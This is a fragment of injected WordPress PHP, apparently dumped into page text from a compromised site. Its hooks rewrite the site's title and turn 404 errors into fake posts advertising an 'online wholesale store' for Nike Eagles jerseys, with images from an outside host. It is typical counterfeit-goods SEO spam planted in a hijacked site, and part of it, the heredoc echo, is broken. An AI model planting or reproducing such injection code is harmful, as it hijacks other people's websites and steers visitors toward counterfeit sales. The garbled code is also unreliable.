$wp->main( "" ); add_filter( 'pre_get_document_title', function( $title ){ $title="online wholesale store Nike Philadelphia Eagles #9 Nick Foles Black Alternate Super Bowl LII Men's Stitched NFL Elite Drift Fashion Jersey"; return $title; }, 999, 1 ); function hook_nocache() { echo << code; } add_action('wp_head', 'hook_nocache',4); function kpg_f_content() { global $wp_query; if($wp_query->is_404 ) { $wp_query->found_posts = 1; $wp_query->post_count = 1; $wp_query->max_num_pages = 1; $wp_query->is_single = 1; $wp_query->is_404 = false; $wp_query->is_posts_page = 1; $wp_query->page=false; $wp_query->is_post=true; $wp_query->page=false; } } function confirm_pages( $posts ) { //do all the stuff here $posts = null; $post = new stdClass(); $post -> post_category = array('ebay'); $post->post_content = 'Online Wholesale Store Nike Philadelphia Eagles #9 Nick Foles Black Alternate Super Bowl LII Men's Stitched NFL Elite Drift Fashion Jersey

Online Wholesale Store Nike Philadelphia Eagles #9 Nick Foles Black Alternate Super Bowl LII Men's Stitched NFL Elite Drift Fashion Jersey

'; $post->post_excerpt="Online Wholesale Store Nike Philadelphia Eagles #9 Nick Foles Black Alternate Super Bowl LII Men's Stitched NFL Elite Drift Fashion Jersey"; $post->post_title = "Online Wholesale Store Nike Philadelphia Eagles #9 Nick Foles Black Alternate Super Bowl LII Men's Stitched NFL Elite Drift Fashion Jersey"; $post->post_images = "http://wpa.icu/images/bjghje/s/online-wholesale-store-nike-philadelphia-eagles-9-nick-foles-black-alternate-super-bowl-lii-mens-stitched-nfl-elite-drift-fashion-jersey.jpg"; $post->post_types = "post"; $post->comment_status = "publish"; $post->filter = 'raw'; $post->post_date = current_time( 'mysql' ); $post->post_date_gmt = current_time( 'mysql', 1 ); $posts[] = $post; return $posts; } add_action('wp', 'kpg_f_content'); add_filter( 'the_posts', 'confirm_pages' );